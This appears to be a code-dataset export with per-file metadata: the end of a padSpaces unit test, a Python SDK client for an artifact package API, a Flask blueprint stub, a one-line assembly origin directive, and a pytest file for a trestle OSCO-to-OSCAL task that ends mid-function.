def test_padSpacesShortLength(self):
results = padSpaces('abc', 1)
expected_results = 'abc'
self.assertEqual(results, expected_results)
def test_padSpacesNumericString(self):
results = padSpaces(51, 3)
expected_results = '51 '
self.assertEqual(results, expected_results)
def test_padSpacesNegLength(self):
results = padSpaces('abc', -1)
expected_results = 'abc'
self.assertEqual(results, expected_results)
if __name__ == '__main__':
unittest.main()
| 47.302326
| 526
| 0.662417
| 2,320
| 28,476
| 8.045259
| 0.085776
| 0.07431
| 0.028503
| 0.020573
| 0.808251
| 0.778677
| 0.767479
| 0.740423
| 0.726172
| 0.71176
| 0
| 0.049098
| 0.217517
| 28,476
| 602
| 527
| 47.302326
| 0.788574
| 0.038559
| 0
| 0.742366
| 0
| 0
| 0.222982
| 0.092687
| 0
| 0
| 0
| 0
| 0.103053
| 1
| 0.104962
| false
| 0.001908
| 0.007634
| 0
| 0.114504
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
514b811494ead6936347ec7c6078f20ed38a45ed
| 18,499
|
py
|
Python
|
artifact_sdk/api/pkg/pkg_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | 5
|
2019-07-31T04:11:05.000Z
|
2021-01-07T03:23:20.000Z
|
artifact_sdk/api/pkg/pkg_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
artifact_sdk/api/pkg/pkg_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import artifact_sdk.api.pkg.batch_update_package_permission_pb2
import artifact_sdk.api.pkg.create_pb2
import artifact_sdk.model.artifact.package_pb2
import artifact_sdk.api.pkg.delete_package_pb2
import artifact_sdk.api.pkg.get_package_detail_pb2
import artifact_sdk.api.pkg.get_package_permission_pb2
import google.protobuf.empty_pb2
import artifact_sdk.api.pkg.get_user_variables_pb2
import artifact_sdk.api.pkg.search_pb2
import artifact_sdk.api.pkg.up_insert_global_variables_pb2
import artifact_sdk.api.pkg.update_pb2
import artifact_sdk.api.pkg.update_package_permission_pb2
import artifact_sdk.utils.http_util
import google.protobuf.json_format
class PkgClient(object):
def __init__(self, server_ip="", server_port=0, service_name="", host=""):
"""
初始化client
:param server_ip: 指定sdk请求的server_ip,为空时走名字服务路由
:param server_port: 指定sdk请求的server_port,与server_ip一起使用, 为空时走名字服务路由
:param service_name: 指定sdk请求的service_name, 为空时按契约名称路由。如果server_ip和service_name同时设置,server_ip优先级更高
:param host: 指定sdk请求服务的host名称, 如cmdb.easyops-only.com
"""
if server_ip == "" and server_port != 0 or server_ip != "" and server_port == 0:
raise Exception("server_ip和server_port必须同时指定")
self._server_ip = server_ip
self._server_port = server_port
self._service_name = service_name
self._host = host
def batch_update_package_permission(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.batch_update_package_permission_pb2.BatchUpdatePackagePermissionRequest, int, str, int) -> artifact_sdk.api.pkg.batch_update_package_permission_pb2.BatchUpdatePackagePermissionResponse
"""
批量修改包权限信息
:param request: batch_update_package_permission请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.api.pkg.batch_update_package_permission_pb2.BatchUpdatePackagePermissionResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.BatchUpdatePackagePermission"
uri = "/permission/packages"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.api.pkg.batch_update_package_permission_pb2.BatchUpdatePackagePermissionResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def create(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.create_pb2.CreateRequest, int, str, int) -> artifact_sdk.model.artifact.package_pb2.Package
"""
创建包
:param request: create请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.model.artifact.package_pb2.Package
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.Create"
uri = "/package"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.model.artifact.package_pb2.Package()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def delete_package(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.delete_package_pb2.DeletePackageRequest, int, str, int) -> artifact_sdk.api.pkg.delete_package_pb2.DeletePackageResponse
"""
删除包
:param request: delete_package请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.api.pkg.delete_package_pb2.DeletePackageResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.DeletePackage"
uri = "/package/package/{packageId}".format(
packageId=request.packageId,
)
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="DELETE",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.api.pkg.delete_package_pb2.DeletePackageResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def get_package_detail(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.get_package_detail_pb2.GetPackageDetailRequest, int, str, int) -> artifact_sdk.model.artifact.package_pb2.Package
"""
获取包详情信息
:param request: get_package_detail请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.model.artifact.package_pb2.Package
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.GetPackageDetail"
uri = "/package/{packageId}".format(
packageId=request.packageId,
)
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="GET",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.model.artifact.package_pb2.Package()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def get_package_permission(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.get_package_permission_pb2.GetPackagePermissionRequest, int, str, int) -> artifact_sdk.model.artifact.package_pb2.Package
"""
获取包权限信息
:param request: get_package_permission请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.model.artifact.package_pb2.Package
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.GetPackagePermission"
uri = "/permission/package/{packageId}".format(
packageId=request.packageId,
)
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="GET",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.model.artifact.package_pb2.Package()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def get_user_variables(self, request, org, user, timeout=10):
# type: (google.protobuf.empty_pb2.Empty, int, str, int) -> artifact_sdk.api.pkg.get_user_variables_pb2.GetUserVariablesResponse
"""
获取程序包的用户变量
:param request: get_user_variables请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.api.pkg.get_user_variables_pb2.GetUserVariablesResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.GetUserVariables"
uri = "/userGlobalVars"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="GET",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.api.pkg.get_user_variables_pb2.GetUserVariablesResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def init_package_permission(self, request, org, user, timeout=10):
# type: (google.protobuf.empty_pb2.Empty, int, str, int) -> google.protobuf.empty_pb2.Empty
"""
初始化包权限
:param request: init_package_permission请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: google.protobuf.empty_pb2.Empty
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.InitPackagePermission"
uri = "/operation/InitPermissionDb"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = google.protobuf.empty_pb2.Empty()
google.protobuf.json_format.ParseDict(rsp_obj, rsp, ignore_unknown_fields=True)
return rsp
def search(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.search_pb2.SearchRequest, int, str, int) -> artifact_sdk.api.pkg.search_pb2.SearchResponse
"""
搜索包
:param request: search请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.api.pkg.search_pb2.SearchResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.Search"
uri = "/package/search"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="GET",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.api.pkg.search_pb2.SearchResponse()
google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
return rsp
def up_insert_global_variables(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.up_insert_global_variables_pb2.UpInsertGlobalVariablesRequest, int, str, int) -> google.protobuf.empty_pb2.Empty
"""
修改全局变量
:param request: up_insert_global_variables请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: google.protobuf.empty_pb2.Empty
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.UpInsertGlobalVariables"
uri = "/userGlobalVars"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = google.protobuf.empty_pb2.Empty()
google.protobuf.json_format.ParseDict(rsp_obj, rsp, ignore_unknown_fields=True)
return rsp
def update(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.update_pb2.UpdateRequest, int, str, int) -> artifact_sdk.api.pkg.update_pb2.UpdateResponse
"""
更新包信息
:param request: update请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: artifact_sdk.api.pkg.update_pb2.UpdateResponse
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.Update"
uri = "/package/{packageId}".format(
packageId=request.packageId,
)
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="PUT",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = artifact_sdk.api.pkg.update_pb2.UpdateResponse()
google.protobuf.json_format.ParseDict(rsp_obj, rsp, ignore_unknown_fields=True)
return rsp
def update_package_permission(self, request, org, user, timeout=10):
# type: (artifact_sdk.api.pkg.update_package_permission_pb2.UpdatePackagePermissionRequest, int, str, int) -> google.protobuf.empty_pb2.Empty
"""
修改包权限信息
:param request: update_package_permission请求
:param org: 客户的org编号,为数字
:param user: 调用api使用的用户名
:param timeout: 调用超时时间,单位秒
:return: google.protobuf.empty_pb2.Empty
"""
headers = {"org": org, "user": user}
route_name = ""
server_ip = self._server_ip
if self._service_name != "":
route_name = self._service_name
elif self._server_ip != "":
route_name = "easyops.api.artifact.pkg.UpdatePackagePermission"
uri = "/permission/package"
requestParam = request
rsp_obj = artifact_sdk.utils.http_util.do_api_request(
method="POST",
src_name="logic.artifact_sdk",
dst_name=route_name,
server_ip=server_ip,
server_port=self._server_port,
host=self._host,
uri=uri,
params=google.protobuf.json_format.MessageToDict(
requestParam, preserving_proto_field_name=True),
headers=headers,
timeout=timeout,
)
rsp = google.protobuf.empty_pb2.Empty()
google.protobuf.json_format.ParseDict(rsp_obj, rsp, ignore_unknown_fields=True)
return rsp
| 37.371717
| 222
| 0.616844
| 2,013
| 18,499
| 5.370094
| 0.076503
| 0.068178
| 0.044033
| 0.053469
| 0.874746
| 0.872988
| 0.86198
| 0.827382
| 0.785106
| 0.756337
| 0
| 0.006231
| 0.28861
| 18,499
| 494
| 223
| 37.447368
| 0.815198
| 0.205092
| 0
| 0.764151
| 0
| 0
| 0.074722
| 0.040588
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037736
| false
| 0
| 0.050314
| 0
| 0.125786
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfa1dbad3edd5596e9e07fcfb63ee21c2eb61e89
| 120
|
py
|
Python
|
mathsonmars/main/__init__.py
|
adriangrepo/mathsonmars
|
3c3dfeb5b23e29d1b4e21c3189972f298f69ce07
|
[
"MIT"
] | null | null | null |
mathsonmars/main/__init__.py
|
adriangrepo/mathsonmars
|
3c3dfeb5b23e29d1b4e21c3189972f298f69ce07
|
[
"MIT"
] | null | null | null |
mathsonmars/main/__init__.py
|
adriangrepo/mathsonmars
|
3c3dfeb5b23e29d1b4e21c3189972f298f69ce07
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
main_view = Blueprint('main_view', __name__)
from mathsonmars.main import mainview, errors
| 24
| 45
| 0.816667
| 16
| 120
| 5.75
| 0.625
| 0.282609
| 0.369565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 120
| 5
| 45
| 24
| 0.867925
| 0
| 0
| 0
| 0
| 0
| 0.07438
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
cfa9e111c581beaf78c04370495eb4fad2da5dd6
| 13
|
py
|
Python
|
f33a20ca-bdf3-4af6-b421-23fdae27107b/dccd6955-85e6-4083-8717-c7692b6a2e22.py
|
copyleftdev/top_contrib_lol
|
362a5849b04dc2b52a9b0da138d4e9a32eade207
|
[
"Apache-2.0"
] | null | null | null |
f33a20ca-bdf3-4af6-b421-23fdae27107b/dccd6955-85e6-4083-8717-c7692b6a2e22.py
|
copyleftdev/top_contrib_lol
|
362a5849b04dc2b52a9b0da138d4e9a32eade207
|
[
"Apache-2.0"
] | null | null | null |
f33a20ca-bdf3-4af6-b421-23fdae27107b/dccd6955-85e6-4083-8717-c7692b6a2e22.py
|
copyleftdev/top_contrib_lol
|
362a5849b04dc2b52a9b0da138d4e9a32eade207
|
[
"Apache-2.0"
] | null | null | null |
[ORG 0x7C00]
| 6.5
| 12
| 0.692308
| 2
| 13
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.363636
| 0.153846
| 13
| 1
| 13
| 13
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.461538
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
320b04e2e0c22a947b4bb91bb90a6d6d5babdf36
| 11,732
|
py
|
Python
|
tests/trestle/tasks/osco_to_oscal_test.py
|
aNebula/compliance-trestle
|
a2949e15b79bfc8ee13dd9822aa49e708548c62d
|
[
"Apache-2.0"
] | 1
|
2021-03-10T13:29:22.000Z
|
2021-03-10T13:29:22.000Z
|
tests/trestle/tasks/osco_to_oscal_test.py
|
aNebula/compliance-trestle
|
a2949e15b79bfc8ee13dd9822aa49e708548c62d
|
[
"Apache-2.0"
] | null | null | null |
tests/trestle/tasks/osco_to_oscal_test.py
|
aNebula/compliance-trestle
|
a2949e15b79bfc8ee13dd9822aa49e708548c62d
|
[
"Apache-2.0"
] | null | null | null |
# -*- mode:python; coding:utf-8 -*-
# Copyright (c) 2020 IBM Corp. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OSCO to OSCAL task tests."""
import configparser
import os
import pathlib
import uuid
from unittest.mock import Mock, patch
import trestle.tasks.osco_to_oscal as osco_to_oscal
from trestle.tasks.base_task import TaskOutcome
uuid_mock1 = Mock(return_value=uuid.UUID('56666738-0f9a-4e38-9aac-c0fad00a5821'))
uuid_mock2 = Mock(return_value=uuid.UUID('46aADFAC-A1fd-4Cf0-a6aA-d1AfAb3e0d3e'))
def test_print_info(tmpdir):
"""Test print_info call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.print_info()
assert retval is None
def test_simulate(tmpdir):
"""Test simulate call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_SUCCESS
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_compressed(tmpdir):
"""Test simulate call with compressed OSCO xml data."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-compressed.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_SUCCESS
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_no_config(tmpdir):
"""Test simulate no config call."""
tgt = osco_to_oscal.OscoToOscal(None)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_FAILURE
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_no_overwrite(tmpdir):
"""Test simulate no overwrite call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 1
section['output-overwrite'] = 'false'
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_FAILURE
assert len(os.listdir(str(tmpdir))) == 1
def test_simulate_no_input_dir(tmpdir):
"""Test simulate with no input dir call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
config.remove_option('task.osco-to-oscal', 'input-dir')
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_FAILURE
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_no_oscal_metadata_file(tmpdir):
"""Test simulate with no metadata file call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-no-oscal-metadata.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['input-metadata'] = 'non-existant.yaml'
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_SUCCESS
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_no_ouput_dir(tmpdir):
"""Test simulate with no output dir call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
config.remove_option('task.osco-to-oscal', 'output-dir')
section = config['task.osco-to-oscal']
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_FAILURE
assert len(os.listdir(str(tmpdir))) == 0
def test_simulate_input_fetcher(tmpdir):
"""Test simulate call OSCO fetcher json data."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-fetcher.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.simulate()
assert retval == TaskOutcome.SIM_SUCCESS
assert len(os.listdir(str(tmpdir))) == 0
@patch(target='uuid.uuid4', new=uuid_mock1)
def test_execute(tmpdir):
"""Test execute call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 1
f_expected = pathlib.Path('tests/data/tasks/osco/output/') / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
@patch(target='uuid.uuid4', new=uuid_mock1)
def test_execute_compressed(tmpdir):
"""Test execute call with compressed OSCO xml data."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-compressed.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 1
f_expected = pathlib.Path('tests/data/tasks/osco/output/') / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
def test_execute_no_config(tmpdir):
"""Test execute no config call."""
tgt = osco_to_oscal.OscoToOscal(None)
retval = tgt.execute()
assert retval == TaskOutcome.FAILURE
assert len(os.listdir(str(tmpdir))) == 0
def test_execute_no_overwrite(tmpdir):
"""Test execute no overwrite call."""
execute_no_overwrite_part1(tmpdir)
execute_no_overwrite_part2(tmpdir)
f_expected = pathlib.Path('tests/data/tasks/osco/output/') / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
@patch(target='uuid.uuid4', new=uuid_mock1)
def execute_no_overwrite_part1(tmpdir):
"""Create expected output."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 1
@patch(target='uuid.uuid4', new=uuid_mock2)
def execute_no_overwrite_part2(tmpdir):
"""Attempt to overwrite."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-overwrite'] = 'false'
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.FAILURE
def test_execute_no_input_dir(tmpdir):
"""Test execute with no input dir call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
config.remove_option('task.osco-to-oscal', 'input-dir')
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.FAILURE
assert len(os.listdir(str(tmpdir))) == 0
@patch(target='uuid.uuid4', new=uuid_mock2)
def test_execute_no_oscal_metadata_file(tmpdir):
"""Test execute with no metadata file call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-no-oscal-metadata.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['input-metadata'] = 'non-existant.yaml'
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 1
f_expected = pathlib.Path('tests/data/tasks/osco/output-no-oscal-metadata/') / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
def test_execute_no_ouput_dir(tmpdir):
"""Test execute with no output dir call."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal.config')
config.read(config_path)
config.remove_option('task.osco-to-oscal', 'output-dir')
section = config['task.osco-to-oscal']
tgt = osco_to_oscal.OscoToOscal(section)
retval = tgt.execute()
assert retval == TaskOutcome.FAILURE
assert len(os.listdir(str(tmpdir))) == 0
@patch(target='uuid.uuid4', new=uuid_mock1)
def test_execute_input_fetcher(tmpdir):
"""Test execute call OSCO fetcher json data."""
config = configparser.ConfigParser()
config_path = pathlib.Path('tests/data/tasks/osco/demo-osco-to-oscal-fetcher.config')
config.read(config_path)
section = config['task.osco-to-oscal']
section['output-dir'] = str(tmpdir)
tgt = osco_to_oscal.OscoToOscal(section)
